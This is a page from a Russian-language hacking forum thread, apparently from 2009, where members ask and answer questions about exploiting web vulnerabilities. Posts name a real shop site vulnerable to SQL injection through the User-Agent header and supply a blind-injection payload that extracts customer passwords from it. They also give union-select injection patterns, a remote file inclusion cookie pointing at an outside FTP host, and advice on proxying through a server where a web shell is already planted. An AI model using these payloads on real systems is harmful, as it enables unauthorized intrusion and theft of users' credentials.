Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    2,191
    Likes Received:
    996
    Reputations:
    155
    TELO, ты достаешь данные не из конфига MySQL / DirectAdmin'a.
     
  2. TELO

    TELO Member

    Joined:
    21 Jan 2009
    Messages:
    99
    Likes Received:
    44
    Reputations:
    6
    а можно подробнее?
     
  3. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    2,191
    Likes Received:
    996
    Reputations:
    155
    Т.е. ты достаешь данные из таблички пользователей сайта. А путь ты нашёл не к админке сайта, а к phpmyadmin'у и directadmin'y, соответственно пароль не подходит. Авторизация, как было сказано выше, на главной странице. Авторизируйся под логином и паролем admin.
     
  4. 2Fed123

    2Fed123 Banned

    Joined:
    26 Feb 2009
    Messages:
    59
    Likes Received:
    5
    Reputations:
    0
    Нашел инъекцию через юзер агента(Tampler data рулит).Как подставлять запросы?
    Пробовал and+select+version() и тд-непрет.
    Сайтик www.prozis.es
    После названия браузера ставим кавычку.
    Code:
    1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '(Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6 (' at line 1
    
    replace into robots (user_agent, last_access, num_access) values ('Mozilla/5.0' (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6 (.NET CLR 3.5.30729)',now(),0)
     
  5. l1ght

    l1ght Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    199
    Likes Received:
    671
    Reputations:
    333
    ',(more1row_or_duplicate_column_names),'1'),('M
     
    2 people like this.
  6. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,043
    Likes Received:
    1,138
    Reputations:
    350
    Вот смотрите, дорогие друзья, вот так НЕНАДО помогать новичкам

    l1ght ты правда думаешь, что он понял? :)
     
    1 person likes this.
  7. cr0w

    cr0w Elder - Старейшина

    Joined:
    11 Sep 2008
    Messages:
    92
    Likes Received:
    141
    Reputations:
    33
    2Fed123

    Почитай про blind-скл-инъекии статьи Elect'a и Qwazar'a на этом форуме.
    Раскрутить можно:
    Code:
    User-Agent: Mozilla/5.0',if((locate(substr((select customers_password from customers limit 1),1),'0123456789abcdef')),now(),(select 1 union select 2)), 0) #
    и т.д.
     
    1 person likes this.
  8. [Raz0r]

    [Raz0r] Elder - Старейшина

    Joined:
    25 Feb 2007
    Messages:
    433
    Likes Received:
    485
    Reputations:
    295
    http://milw0rm.com/exploits/8921
     
  9. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    736
    Likes Received:
    404
    Reputations:
    134
    Насколько я понимаю, то к этому:
    этот сплойт:
    не прокатит, т.к. не подходит конфигурация пма.
     
  10. Rezak

    Rezak New Member

    Joined:
    25 Jan 2008
    Messages:
    4
    Likes Received:
    1
    Reputations:
    0
    Где-то видел тут на античате тему про, то как делать эксплоит скрипта типа
    PHP:
    <? $a($b); ?>
    он юзается примерно так: test.php?a=phpinfo&b=32
    вот и подумал может с классами также можно извратиться.

    P.S. Это к сообщению про вот этот скрипт
    PHP:
    <?
    $template->set_filenames(array('head'=>"$template_path/header.html"));
    $template->pparse('head');
    ?>
     
    #9310 Rezak, 17 Oct 2009
    Last edited: 17 Oct 2009
  11. tracy

    tracy Elder - Старейшина

    Joined:
    24 Mar 2009
    Messages:
    278
    Likes Received:
    119
    Reputations:
    40
    есть какие нибудь базы по хешам желательный на пхп или exe
     
  12. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    2,191
    Likes Received:
    996
    Reputations:
    155
    hashcracking.info
     
  13. Byrger

    Byrger Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    554
    Likes Received:
    26
    Reputations:
    -4
    Привет есть стандартная инъекция в MySQL вида:
    site.ru/index.php?id=1+union+select+1,2,3,4,5--+
    Возможно ли сделать UPDATE или INSERT в базу?
     
  14. Iceangel_

    Iceangel_ Elder - Старейшина

    Joined:
    9 Jul 2006
    Messages:
    506
    Likes Received:
    533
    Reputations:
    158
    нет
     
    1 person likes this.
  15. Byrger

    Byrger Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    554
    Likes Received:
    26
    Reputations:
    -4
    Возможно ли сделать прокси из сервера на котором есть шелл?
    Если не рутить его (выдел в шелле можно порты вроде какието открывать.)
     
  16. Dyxxx

    Dyxxx Elder - Старейшина

    Joined:
    16 Feb 2009
    Messages:
    106
    Likes Received:
    153
    Reputations:
    24
    https://forum.antichat.ru/thread93318.html
     
  17. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    2,191
    Likes Received:
    996
    Reputations:
    155
    Есть скрипт, который проверяет является ли папкой (ф-цией is_dir) значение skin в куках. Если да, то идёт инклюд:
    PHP:
    if(is_dir($_COOKIE['skin']))
    include(
    $_COOKIE['skin'].'/template.php');
    Можно ли реализовать LFI произвольного файла, а не только template.php?. Если же заюзать NULL - байт, то инклюдится ничего не будет, ибо is_dir возвратит false.
     
    #9317 mailbrush, 17 Oct 2009
    Last edited: 17 Oct 2009
  18. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    754
    Likes Received:
    649
    Reputations:
    251
    Это можно замутить если тока register_globals = on
    в php.ini
     
  19. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,043
    Likes Received:
    1,138
    Reputations:
    350
    Там RFI
    Cookie: skin=ftp://vasya:tapochkin@ftp.narod.ru/

    ну а на фтпшнике соответственно файл template.php
    + "Начиная с PHP 5.0.0, эта функция также может быть использована с некоторыми упаковщиками url."
    ==
    Если интересует именно LFI произвольного файла, то врятли
     
    #9319 Kakoytoxaker, 17 Oct 2009
    Last edited: 17 Oct 2009
    2 people like this.
  20. Qwazar

    Qwazar Elder - Старейшина

    Joined:
    2 Jun 2005
    Messages:
    1,007
    Likes Received:
    908
    Reputations:
    587
    Покажи как. Вот как раз для случая с
    Code:
    $template->set_filenames(array('head'=>"$template_path/header.html")); 
     
Loading...
Thread Status:
Not open for further replies.